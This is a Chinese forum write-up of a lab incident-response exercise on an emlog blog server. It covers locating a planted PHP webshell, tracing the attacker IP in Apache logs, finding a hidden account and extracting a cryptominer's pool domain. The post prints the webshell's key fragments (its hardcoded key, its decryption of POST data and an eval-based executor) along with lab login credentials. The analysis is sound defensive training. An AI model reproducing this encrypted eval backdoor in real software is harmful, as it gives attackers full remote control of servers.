玄机——第四章 windows实战-emlog wp

铁佛  金牌会员 | 2024-9-28 16:15:14 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 986|帖子 986|积分 2958

一、媒介

标题链接:第四章 windows实战-emlog
三连私信免费送玄机注册邀请码私信!!!瞥见就回!!注意私信!!
首先简单了解一下什么是emlog;
Emlog 是一款开源的轻量级博客系统,其名称来自 “Every Memory Log”,旨在为用户提供简单易用的博客平台。Emlog 的设计理念是简洁、高效和轻量,适合个人用户和小型网站。
主要特点

  • 轻量级

    • Emlog 代码简洁,不依赖复杂的架构,安装和运行都很轻便,资源消耗较低。

  • 易用性

    • 提供简洁直观的管理背景,用户界面友爱,适合没有技术配景的用户。

  • 插件扩展

    • Emlog 支持插件扩展,用户可以根据需求安装插件来增长功能。

  • 模板支持

    • 支持模板更换,用户可以选择或自界说模板来改变网站的外观。

  • 静态页面生成

    • 支持生成静态页面,进步网站访问速率和 SEO 结果。

  • 多语言支持

    • Emlog 提供多语言支持,适合差别语言配景的用户。

应用场景

  • 个人博客

    • Emlog 适合个人用户创建和管理博客,纪录日常生活和思想。

  • 小型网站

    • 由于其轻量级和高效性,Emlog 也适合用于创建小型企业网站或作品展示网站。

  • 自媒体平台

    • 自媒体从业者可以利用 Emlog 搭建个人博客平台,发布和管理内容,创建个品德牌。

总结
Emlog 是一款简洁、高效的轻量级博客系统,适合个人用户和小型网站利用。其易用性和扩展性使其成为许多用户的首选博客平台。通过支持插件和模板,Emlog 可以机动地扩展功能和定制外观,满足差别用户的需求。
二、概览

简介

服务器场景操纵系统 Windows
服务器账号密码 administrator xj@123456
标题来源公众号 知攻善防实行室
https://mp.weixin.qq.com/s/89IS3jPePjBHFKPXnGmKfA
任务情况说明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急相应工程师小王或人收到安全设备告警服务器被植入恶意文件,请上机排查
开放标题
毛病修复
参考
https://mp.weixin.qq.com/s/1gebC1OkDgtz4k4YtN10dg
1、通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;
2、通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
3、通过本地 PC RDP到服务器并且分析黑客的潜伏账户名称,将黑客潜伏账户名称作为 FLAG 提交;
4、通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;
三、参考文章

第四章 windows 实战 - emlog
玄机-windows实战
四、步骤(分析)

准备阶段#1.0

利用长途桌面连接靶机;(详细操纵:玄机——第四章 windows实战-wordpress wp)
靶机的IP;

输入举行生存,返回进入即可;

成功连接靶机;

步骤#1

通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;

解题思路
   标题让我们通过本机连接靶机(已连接成功),将黑客写入的shell的密码提交,简单来说就是找shell嘛,看过我文章的肯定就已经知道怎样查杀shell了(已经不知道说明多少遍了),老例子嘛,查杀webshell,也就只有工查杀以及工具查杀,这里既然能用工具那肯定就利用工具(工具相对于手工来说更便捷),如对手工查杀webshell感爱好师傅请移步至:webshell查杀。那这里同样我更喜欢用D盾举行查杀shell(工具不唯一,仅供参考);
  简单扫一眼,就在桌面上发现“PHPStudy”,PHPStudy是一款集成了 PHP、Apache、MySQL、Nginx 等常用 Web 开发情况的本地集成开发情况工具。简单来说就是一普通搭建网站的,既然是搭建网站的,那黑客肯定就是从这边动手的咯;(详细:PHPStudy简介);
所以那我们直接鼠标右键PHPStudy“打开文件位置”,接着返回到PHPStudy_pro目录下;

接着找到PHPStudy_pro目录下的WWW目录,为什么只找WWW目录?
由于在 PHPStudy Pro 中,WWW 目录通常是存放 Web 项目标根目录。这个目录是 Apache 或 Nginx 等 Web 服务器的默认站点目录,所有的 Web 项目文件和代码都会放在这个目录中。
总之,WWW 目录是 PHPStudy Pro 中存放所有 Web 项目文件的地方,是开发和测试 Web 应用的核心目录。
那标题问我们黑客写入的shell,所以我们直接压缩一下WWW目录,导到本机利用D盾举行分析;(所谓的导到本机,就是Ctrl+c,Ctrl+v,注意要先压缩)

接着利用D盾举行扫描解压之后的WWW目录;

很快就发现了黑客植入的后门shell.php,那我们跟进分析;
得到;

标题问我们连接的密码;
所以;
  1. flag{rebeyond}
复制代码
拓展1.1

简单分析一下这个shell;
这是一个典范的后门程序(backdoor shell),包含了一些潜伏和加密的特性。

  • @error_reporting(0);

    • 关闭所有错误陈诉,以防止暴露错误信息。

  • session_start();

    • 启动一个新的会话或继续当前会话。

  • $key="e45e329feb5d925b";

    • 设置一个密钥,这个密钥是一个 16 字节的字符串,通常是某个32位MD5值的前16位。

  • $_SESSION['k']=$key;

    • 将密钥存储在会话变量中。

  • session_write_close();

    • 写入会话数据并关闭会话存储,以优化性能。

  • $post=file_get_contents("php://input");

    • 获取原始 POST 数据。这通常用于吸收二进制数据或较大的数据块。

  • 查抄是否加载了 openssl 扩展:

    • if(!extension_loaded('openssl'))

      • 假如没有加载 openssl 扩展,则利用 XOR 和 Base64 解码。

        • base64_decode 解码 POST 数据。
        • 利用 XOR 操尴尬刁难数据举行解密,每个字符与密钥的对应字符举行异或运算。


    • else

      • 假如加载了 openssl 扩展,则利用 AES-128 加密算法解密数据。

        • openssl_decrypt 解密 POST 数据,利用 AES128 和密钥。



  • explode('|', $post);

    • 将解密后的数据用 | 分割成一个数组,第一个元素是函数名,第二个元素是参数。

  • 界说一个类 C:

    • class C{public function __invoke($p) {eval($p."");}}

      • 这个类界说了一个魔术方法 __invoke,它接受一个参数 $p 并执行 eval($p."");。
      • eval 函数会执行传入的 PHP 代码,这是一种非常危险的函数,允许执行任意 PHP 代码。


  • @call_user_func(new C(),$params);

    • 利用 call_user_func 调用类 C 的实例,并将参数 $params 传递给它。
    • 最终的结果是执行解密后从 POST 数据中提取出来的 PHP 代码。

简单总结
这段代码实际上是一个加密的后门程序。它通过吸收加密的数据,然后解密并执行其中的 PHP 代码。这使得攻击者可以通过发送特定的加密请求来执行任意的 PHP 代码,从而完全控制服务器。
主要危险点包罗:


  • 利用 eval 函数执行任意 PHP 代码。
  • 通过加密潜伏恶意代码,难以被普通的扫描工具检测到。
  • 利用会话和加密机制,使得攻击通讯难以被辨认和拦截。
这种后门程序常用于网络攻击中的长期访问,通过潜伏本领保持对受感染服务器的控制。
步骤#2

通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

解题思路
标题让我们提交黑客的IP,这种没什么说的,基本上就是分析日志了(在别的文章中也夸大很多遍,分析日志,这里就不再夸大了),那就找PHPStudy_pro存放日志的地方呗;
定位到了,Nginx日志但是发现巨细都是0,所以那这里就不是Nginx日志了,去看看Apache2的日志;

找到Apache日志,发现access.log存在信息很多,右键记事本打开举行分析;

题一既然说了黑客写入了shell.php,那我们直接Ctrl+f查找关键字“shell”即可;
得到

得到;
   192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] “GET /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] “GET /content/plugins/tips/shell.php?888666=619 HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:47:54 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:47:54 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
192.168.126.1 - - [26/Feb/2024:22:48:47 +0800] “POST /content/plugins/tips/shell.php HTTP/1.1” 200 -
  简单分析一下;
   不难看出,黑客在短时间内对 /content/plugins/tips/shell.php 举行了多次请求。这些操纵表明,黑客在利用 shell.php 文件举行长途代码执行或文件操纵。这是一个典范的 Webshell 攻击,攻击者上传或利用现有的 Webshell 文件,然后通过这些文件执行恶意命令。
  所以;
  1. flag{192.168.126.1}
复制代码
步骤#3

通过本地 PC RDP到服务器并且分析黑客的潜伏账户名称,将黑客潜伏账户名称作为 FLAG 提交;

解题思路
标题让我们找出黑客潜伏的用户名称,既然说用户名称了,那肯定就是查靶机的用户组了呗(window应急的基础操纵),“本地用户和组”是在“盘算机管理”里面,想找到“盘算机管理”实在也简单,直接在搜索栏搜索即可;
搜索栏搜索“盘算机管理”;

接着点击“本地用户和组”举行分析即可;

可以从描述这边发现,别的都有,就只有这个没有;(或者要不确定,可以都提交一次)

当然也是可以从用户里面发现;

末了也是可以发现;

当然,也可以直接利用“net user”举行查询盘算机的所有效户,但是这里好像潜伏了,并没有发现;

所以末了;
  1. flag{hacker138}
复制代码
步骤#4

通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

解题思路
让我们找出黑客的挖矿程序的矿池域名,题三既然找到了黑客潜伏的用户,那就跟进分析,一个一个文件举行分析,后来在“桌面”这个目录下发现了,利用英文写的kuang,完事了它还是个exe,所以这里就不必多言,那现在既然找到了挖矿程序,那怎样找到矿的域池名呢?
   既然现在已经知道挖矿程序了(kuang.exe),那我们直接利用脚本工具“pyinstxtractor.py”把kuang.exe转换成pyc文件,接着随便找一个pyc在线反编译即可发现池域名;
  

那我们先来举行实操一下,老例子想把文件从靶机里面导出之前(kuang.exe),必须先把压缩一下;
pyinstxtractor工具下载
利用方法:Pyinstaller 反编译教程(exe转py)
下载完毕,接着把kuang.exe复制到脚本工具“pyinstxtractor”目录下;

接着直接在当前目录“cmd”即可;

命令执行;
  1. python pyinstxtractor.py kuang.exe
复制代码
得到;

返回目录举行查看多了一个“Kuang.exe_extracted”文件,接着跟进,翻到底下会发现在zip下有一个“Kuang”空白文件(注意,这里假如是直接的kuang.pyc,那就直接在线工具pyc反编译即可),我们重命名,后缀加上.pyc即可,接着找一个pyc在线反编译即可;

pyc在线反编译
接着把刚刚修改后缀的文件上传就发现了池域名;

得到;
   http://wakuang.zhigongshanfang.top
  根据提交格式:仅域名;
所以末了;
  1. flag{wakuang.zhigongshanfang.top}
复制代码
当然不想找在线也可以,直接拖进010举行查找也可以;
也是发现了:http://wakuang.zhigongshanfang.top;


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

铁佛

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表